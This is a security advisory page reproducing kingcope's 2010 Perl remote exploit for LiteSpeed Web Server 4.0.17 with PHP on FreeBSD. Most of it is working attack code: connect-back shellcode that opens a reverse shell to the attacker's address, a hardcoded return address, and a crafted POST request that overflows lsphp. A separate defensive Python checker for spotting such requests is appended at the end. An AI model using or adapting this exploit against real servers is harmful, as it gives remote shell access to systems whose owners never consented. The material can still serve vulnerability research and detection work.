SECURITYVULNS:DOC:25307
Dec 14, 2010

LiteSpeed Web Server 4.0.17 w/ PHP Remote Exploit for FreeBSD

vulners.com

bug discovered & exploited by Kingcope
Dec 2010

Lame Xploit Tested with success on

FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
FreeBSD 6.3-RELEASE - LiteSpeed WebServer 4.0.17 Standard & Enterprise x86
FreeBSD 8.0-RELEASE - LiteSpeed WebServer 4.0.15 Standard x86

can be used against the admin interface (port 7080), too

Xploit only works on the default lsphp binary, not the compiled version.

this should be exploitable on linux too (on the compiled SAPI version).
the shipped linux version of lsphp has stack cookies enabled, which could be brute forced if there wasn't a null put at the end of the exploit buffer. The compiled SAPI version is exploitable, but then the offsets differ from box to box, so this time FreeBSD targets only. thus on linux this is very tricky to exploit.

this is a proof of concept, don't try this on real boxes

see lsapilib.c line 1240
(http://litespeedtech.com/packages/lsapi/php-litespeed-5.4.tgz)

use IO::Socket;

$|=1;

#freebsd reverse shell port 443
#setup a netcat on this port ^^
$bsdcbsc =
# setreuid, no root here

"\x31\xc0\x31\xc0\x50\x31\xc0\x50\xb0\x7e\x50\xcd\x80".
# connect back :>
"\x31\xc0\x31\xdb\x53\xb3\x06\x53".
"\xb3\x01\x53\xb3\x02\x53\x54\xb0".
"\x61\xcd\x80\x31\xd2\x52\x52\x68".
"\x41\x41\x41\x41\x66\x68\x01\xbb".
"\xb7\x02\x66\x53\x89\xe1\xb2\x10".
"\x52\x51\x50\x52\x89\xc2\x31\xc0".
"\xb0\x62\xcd\x80\x31\xdb\x39\xc3".
"\x74\x06\x31\xc0\xb0\x01\xcd\x80".
"\x31\xc0\x50\x52\x50\xb0\x5a\xcd".
"\x80\x31\xc0\x31\xdb\x43\x53\x52".
"\x50\xb0\x5a\xcd\x80\x31\xc0\x43".
"\x53\x52\x50\xb0\x5a\xcd\x80\x31".
"\xc0\x50\x68\x2f\x2f\x73\x68\x68".
"\x2f\x62\x69\x6e\x89\xe3\x50\x54".
"\x53\x50\xb0\x3b\xcd\x80\x31\xc0".
"\xb0\x01\xcd\x80";

sub usage() {
print "written by kingcope\n";
print "usage:\n".
"litespeed-remote.pl <target ip/host> <target port> <your ip> <php file on remote host>\n\n".
"example:\n".
"perl litespeed-remote.pl 192.168.2.3 8088 192.168.2.2 phpinfo.php\n\n";
    exit;
}

if ($#ARGV ne 3) { usage; }

$target = $ARGV[0];
$port = $ARGV[1];
$cbip = $ARGV[2];
$file = $ARGV[3];

($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));

substr($bsdcbsc, 37, 4, $a1 . $a2 . $a3 . $a4);

#my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => 8088, Proto => 'tcp');
#$a = "A" x 500;
#print $sock "POST /phpinfo.php HTTP/1.1\r\nHost: 192.168.2.5\r\n\r\n";

#$x = <stdin>;

#$ret = pack("V", 0x28469478); # FreeBSD 7.3-RELEASE
#$ret = pack("V", 0x82703c0); # FreeBSD 6.3-RELEASE
$ret = pack("V", 0x080F40CD); # JMP EDX lsphp

my $sock = IO::Socket::INET->new(PeerAddr => $target,
PeerPort => $port,
Proto =>
'tcp');

$a = "A" x 263 . "AAAA" x 6 . $ret . "C" x 500;
$sc = "\x90" x 3000 . $bsdcbsc;

print $sock "POST /\x90\x90\x90\x90\x90\x90\xeb\x50/…/$file? HTTP/1.1\r\nHost: $target\r\nVVVV: $sc\r\n$a KINGCOPEH4XXU:\r\n\r\n";

while (<$sock>) {
print;
}
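As an added defender-side example (not part of kingcope's advisory or of LiteSpeed's code), the following Python check flags request heads with the shape the advisory describes: non-URI bytes in the request target, control bytes or oversized values in a header, and header lines whose name is not a token. The thresholds and the two sample requests are constructed assumptions, not values from the page.

```python
# Added example, not part of kingcope's advisory: a sanity check a defender
# can run over captured HTTP request heads to spot the traffic shape
# described above (raw high/control bytes in the request target and in
# header values, oversized or malformed header lines). Thresholds and
# sample requests are constructed assumptions, not values from the page.

# Bytes RFC 3986 allows in a request target (unreserved + reserved + '%').
TARGET_OK = frozenset(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
                      b"0123456789-._~:/?#[]@!$&'()*+,;=%")
MAX_HEADER_VALUE = 2048   # assumed: longest header value tolerated

def inspect_request(raw: bytes) -> list:
    """Return findings for one raw request head; [] means nothing odd."""
    findings = []
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or not parts[2].startswith(b"HTTP/"):
        return ["malformed request line"]
    bad = sorted({b for b in parts[1] if b not in TARGET_OK})
    if bad:
        findings.append("non-URI bytes in request target: "
                        + " ".join("0x%02x" % b for b in bad))
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        # A field name is a token: no whitespace, no control or high bytes.
        if not sep or not name or any(b <= 0x20 or b >= 0x7f for b in name):
            findings.append("malformed header line: %r" % line[:32])
            continue
        value = value.strip()
        ctl = sum(1 for b in value if b < 0x20 and b != 0x09)
        if ctl:
            findings.append("header %s has %d control bytes" % (name.decode(), ctl))
        if len(value) > MAX_HEADER_VALUE:
            findings.append("header %s value is %d bytes" % (name.decode(), len(value)))
    return findings

# Constructed sample traffic: one ordinary request and one shaped like the
# advisory's (NOP-like bytes in the path, a huge header, a name with spaces).
BENIGN = (b"POST /index.php?x=1 HTTP/1.1\r\nHost: www.example.test\r\n"
          b"Content-Length: 3\r\n\r\na=b")
SUSPECT = (b"POST /\x90\x90\x90/index.php? HTTP/1.1\r\nHost: www.example.test\r\n"
           b"VVVV: " + b"\x90" * 2500 + b"\x01\x02\r\n"
           + b"A" * 30 + b" JUNKNAME:\r\n\r\n")

def scan(requests) -> dict:
    """Map request index -> findings for every request that has any."""
    results = ((i, inspect_request(r)) for i, r in enumerate(requests))
    return {i: f for i, f in results if f}
```

Run `scan([BENIGN, SUSPECT])` to see only the second request reported; the same function can be fed request heads extracted from a packet capture or a reverse-proxy access log that records raw request lines.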